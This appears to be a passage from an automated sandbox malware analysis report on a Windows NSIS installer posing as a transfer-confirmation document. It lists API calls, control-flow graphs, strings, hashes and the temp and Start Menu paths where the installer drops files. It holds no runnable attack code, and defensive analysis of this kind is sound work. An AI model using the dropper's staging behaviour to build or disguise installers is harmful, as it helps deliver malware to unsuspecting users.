                  • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                  • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                  APIs
                  • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,771B2EE0,00405790,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00406236
                  • FindClose.KERNEL32(00000000), ref: 00406242
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID: WB
                  • API String ID: 2295610775-2854515933
                  • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                  • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                  • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                  • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                  APIs
                  • GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                  • LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: AddressHandleLibraryLoadModuleProc
                  • String ID:
                  • API String ID: 310444273-0
                  • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                  • Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
                  • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                  • Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 167 4038b2-4038ca call 406252 170 4038cc-4038dc call 405e2f 167->170 171 4038de-403915 call 405db5 167->171 180 403938-403961 call 403b88 call 405a3b 170->180 176 403917-403928 call 405db5 171->176 177 40392d-403933 lstrcatW 171->177 176->177 177->180 185 4039f3-4039fb call 405a3b 180->185 186 403967-40396c 180->186 192 403a09-403a2e LoadImageW 185->192 193 4039fd-403a04 call 405f0a 185->193 186->185 188 403972-40399a call 405db5 186->188 188->185 194 40399c-4039a0 188->194 196 403a30-403a60 RegisterClassW 192->196 197 403aaf-403ab7 call 40140b 192->197 193->192 198 4039b2-4039be lstrlenW 194->198 199 4039a2-4039af call 405960 194->199 200 403a66-403aaa SystemParametersInfoW CreateWindowExW 196->200 201 403b7e 196->201 210 403ac1-403acc call 403b88 197->210 211 403ab9-403abc 197->211 205 4039c0-4039ce lstrcmpiW 198->205 206 4039e6-4039ee call 405933 call 405ee8 198->206 199->198 200->197 203 403b80-403b87 201->203 205->206 209 4039d0-4039da GetFileAttributesW 205->209 206->185 213 4039e0-4039e1 call 40597f 209->213 214 4039dc-4039de 209->214 220 403ad2-403aef ShowWindow LoadLibraryW 210->220 221 403b55-403b56 call 405265 210->221 211->203 213->206 214->206 214->213 223 403af1-403af6 LoadLibraryW 220->223 224 403af8-403b0a GetClassInfoW 220->224 227 403b5b-403b5d 221->227 223->224 225 403b22-403b45 DialogBoxParamW call 40140b 224->225 226 403b0c-403b1c GetClassInfoW RegisterClassW 224->226 231 403b4a-403b53 call 403802 225->231 226->225 229 403b77-403b79 call 40140b 227->229 230 403b5f-403b65 227->230 229->201 230->211 232 403b6b-403b72 call 40140b 230->232 231->203 232->211
                  APIs
                    • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                    • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                    • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                  • lstrcatW.KERNEL32(1033,004226D0), ref: 00403933
                  • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user~1\AppData\Local\Temp\), ref: 004039B3
                  • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                  • GetFileAttributesW.KERNEL32(: Completed), ref: 004039D1
                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes), ref: 00403A1A
                    • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                  • RegisterClassW.USER32(00428180), ref: 00403A57
                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                  • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                  • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                  • RegisterClassW.USER32(00428180), ref: 00403B1C
                  • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                  • String ID: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                  • API String ID: 914957316-3002412492
                  • Opcode ID: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
                  • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
                  • Opcode Fuzzy Hash: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
                  • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 238 403c55-403c67 239 403da8-403db7 238->239 240 403c6d-403c73 238->240 242 403e06-403e1b 239->242 243 403db9-403e01 GetDlgItem * 2 call 40412d SetClassLongW call 40140b 239->243 240->239 241 403c79-403c82 240->241 244 403c84-403c91 SetWindowPos 241->244 245 403c97-403c9a 241->245 247 403e5b-403e60 call 404179 242->247 248 403e1d-403e20 242->248 243->242 244->245 250 403cb4-403cba 245->250 251 403c9c-403cae ShowWindow 245->251 256 403e65-403e80 247->256 253 403e22-403e2d call 401389 248->253 254 403e53-403e55 248->254 257 403cd6-403cd9 250->257 258 403cbc-403cd1 DestroyWindow 250->258 251->250 253->254 269 403e2f-403e4e SendMessageW 253->269 254->247 255 4040fa 254->255 263 4040fc-404103 255->263 261 403e82-403e84 call 40140b 256->261 262 403e89-403e8f 256->262 266 403cdb-403ce7 SetWindowLongW 257->266 267 403cec-403cf2 257->267 264 4040d7-4040dd 258->264 261->262 272 403e95-403ea0 262->272 273 4040b8-4040d1 DestroyWindow EndDialog 262->273 264->255 270 4040df-4040e5 264->270 266->263 274 403d95-403da3 call 404194 267->274 275 403cf8-403d09 GetDlgItem 267->275 269->263 270->255 277 4040e7-4040f0 ShowWindow 270->277 272->273 278 403ea6-403ef3 call 405f0a call 40412d * 3 GetDlgItem 272->278 273->264 274->263 279 403d28-403d2b 275->279 280 403d0b-403d22 SendMessageW IsWindowEnabled 275->280 277->255 308 403ef5-403efa 278->308 309 403efd-403f39 ShowWindow KiUserCallbackDispatcher call 40414f EnableWindow 278->309 281 403d30-403d33 279->281 282 403d2d-403d2e 279->282 280->255 280->279 286 403d41-403d46 281->286 287 403d35-403d3b 281->287 285 403d5e-403d63 call 404106 282->285 285->274 289 403d7c-403d8f SendMessageW 286->289 291 403d48-403d4e 286->291 287->289 290 403d3d-403d3f 287->290 289->274 290->285 294 403d50-403d56 call 40140b 291->294 295 403d65-403d6e call 40140b 291->295 306 403d5c 294->306 295->274 304 403d70-403d7a 295->304 304->306 306->285 308->309 312 403f3b-403f3c 309->312 313 403f3e 309->313 314 403f40-403f6e GetSystemMenu EnableMenuItem SendMessageW 312->314 313->314 315 403f70-403f81 SendMessageW 314->315 316 403f83 314->316 317 403f89-403fc7 call 404162 call 405ee8 lstrlenW call 405f0a SetWindowTextW call 401389 315->317 316->317 317->256 326 403fcd-403fcf 317->326 326->256 327 403fd5-403fd9 326->327 328 403ff8-40400c DestroyWindow 327->328 329 403fdb-403fe1 327->329 328->264 331 404012-40403f CreateDialogParamW 328->331 329->255 330 403fe7-403fed 329->330 330->256 332 403ff3 330->332 331->264 333 404045-40409c call 40412d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 331->333 332->255 333->255 338 40409e-4040b1 ShowWindow call 404179 333->338 340 4040b6 338->340 340->264
                  APIs
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                  • ShowWindow.USER32(?), ref: 00403CAE
                  • DestroyWindow.USER32 ref: 00403CC2
                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                  • GetDlgItem.USER32(?,?), ref: 00403CFF
                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                  • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                  • GetDlgItem.USER32(?,00000001), ref: 00403DC8
                  • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
                  • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                  • ShowWindow.USER32(00000000,?), ref: 00403F04
                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
                  • EnableWindow.USER32(?,?), ref: 00403F31
                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
                  • EnableMenuItem.USER32(00000000), ref: 00403F4E
                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                  • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                  • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                  • ShowWindow.USER32(?,0000000A), ref: 004040EA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                  • String ID:
                  • API String ID: 3282139019-0
                  • Opcode ID: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
                  • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                  • Opcode Fuzzy Hash: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
                  • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 341 402dba-402e08 GetTickCount GetModuleFileNameW call 405b54 344 402e14-402e42 call 405ee8 call 40597f call 405ee8 GetFileSize 341->344 345 402e0a-402e0f 341->345 353 402f32-402f40 call 402d18 344->353 354 402e48-402e5f 344->354 346 403059-40305d 345->346 361 403011-403016 353->361 362 402f46-402f49 353->362 356 402e61 354->356 357 402e63-402e70 call 4032f7 354->357 356->357 363 402e76-402e7c 357->363 364 402fcd-402fd5 call 402d18 357->364 361->346 365 402f75-402fc1 GlobalAlloc call 40636e call 405b83 CreateFileW 362->365 366 402f4b-402f63 call 40330d call 4032f7 362->366 367 402efc-402f00 363->367 368 402e7e-402e96 call 405b0f 363->368 364->361 392 402fc3-402fc8 365->392 393 402fd7-403007 call 40330d call 403060 365->393 366->361 389 402f69-402f6f 366->389 372 402f02-402f08 call 402d18 367->372 373 402f09-402f0f 367->373 368->373 387 402e98-402e9f 368->387 372->373 379 402f11-402f1f call 406300 373->379 380 402f22-402f2c 373->380 379->380 380->353 380->354 387->373 391 402ea1-402ea8 387->391 389->361 389->365 391->373 394 402eaa-402eb1 391->394 392->346 401 40300c-40300f 393->401 394->373 396 402eb3-402eba 394->396 396->373 398 402ebc-402edc 396->398 398->361 400 402ee2-402ee6 398->400 403 402ee8-402eec 400->403 404 402eee-402ef6 400->404 401->361 402 403018-403029 401->402 405 403031-403036 402->405 406 40302b 402->406 403->353 403->404 404->373 407 402ef8-402efa 404->407 408 403037-40303d 405->408 406->405 407->373 408->408 409 40303f-403057 call 405b0f 408->409 409->346
                  APIs
                  • GetTickCount.KERNEL32 ref: 00402DCE
                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,00000400), ref: 00402DEA
                    • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,80000000,00000003), ref: 00405B58
                    • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,80000000,00000003), ref: 00402E33
                  • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A
                  Strings
                  • Error launching installer, xrefs: 00402E0A
                  • Inst, xrefs: 00402EA1
                  • soft, xrefs: 00402EAA
                  • Null, xrefs: 00402EB3
                  • C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe, xrefs: 00402DD4, 00402DE3, 00402DF7, 00402E14
                  • "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", xrefs: 00402DC3
                  • C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                  • String ID: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                  • API String ID: 2803837635-3981451405
                  • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                  • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
                  • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                  • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 538 401752-401777 call 402b38 call 4059aa 543 401781-401793 call 405ee8 call 405933 lstrcatW 538->543 544 401779-40177f call 405ee8 538->544 549 401798-401799 call 40617c 543->549 544->549 553 40179e-4017a2 549->553 554 4017a4-4017ae call 40622b 553->554 555 4017d5-4017d8 553->555 562 4017c0-4017d2 554->562 563 4017b0-4017be CompareFileTime 554->563 556 4017e0-4017fc call 405b54 555->556 557 4017da-4017db call 405b2f 555->557 565 401870-401899 call 405192 call 403060 556->565 566 4017fe-401801 556->566 557->556 562->555 563->562 578 4018a1-4018ad SetFileTime 565->578 579 40189b-40189f 565->579 567 401852-40185c call 405192 566->567 568 401803-401841 call 405ee8 * 2 call 405f0a call 405ee8 call 4056c4 566->568 580 401865-40186b 567->580 568->553 600 401847-401848 568->600 582 4018b3-4018be FindCloseChangeNotification 578->582 579->578 579->582 583 4029ce 580->583 585 4018c4-4018c7 582->585 586 4029c5-4029c8 582->586 587 4029d0-4029d4 583->587 590 4018c9-4018da call 405f0a lstrcatW 585->590 591 4018dc-4018df call 405f0a 585->591 586->583 597 4018e4-402241 call 4056c4 590->597 591->597 597->586 597->587 600->580 602 40184a-40184b 600->602 602->567
                  APIs
                  • lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
                  • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user~1\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac","C:\Users\user~1\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",00000000,00000000,"C:\Users\user~1\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen,?,?,00000031), ref: 004017B8
                    • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                    • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                    • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                    • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                  • String ID: "C:\Users\user~1\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac"$C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
                  • API String ID: 1941528284-3300110800
                  • Opcode ID: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
                  • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
                  • Opcode Fuzzy Hash: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
                  • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 604 405192-4051a7 605 4051ad-4051be 604->605 606 40525e-405262 604->606 607 4051c0-4051c4 call 405f0a 605->607 608 4051c9-4051d5 lstrlenW 605->608 607->608 610 4051f2-4051f6 608->610 611 4051d7-4051e7 lstrlenW 608->611 613 405205-405209 610->613 614 4051f8-4051ff SetWindowTextW 610->614 611->606 612 4051e9-4051ed lstrcatW 611->612 612->610 615 40520b-40524d SendMessageW * 3 613->615 616 40524f-405251 613->616 614->613 615->616 616->606 617 405253-405256 616->617 617->606
                  APIs
                  • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                  • lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                  • lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                  • SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
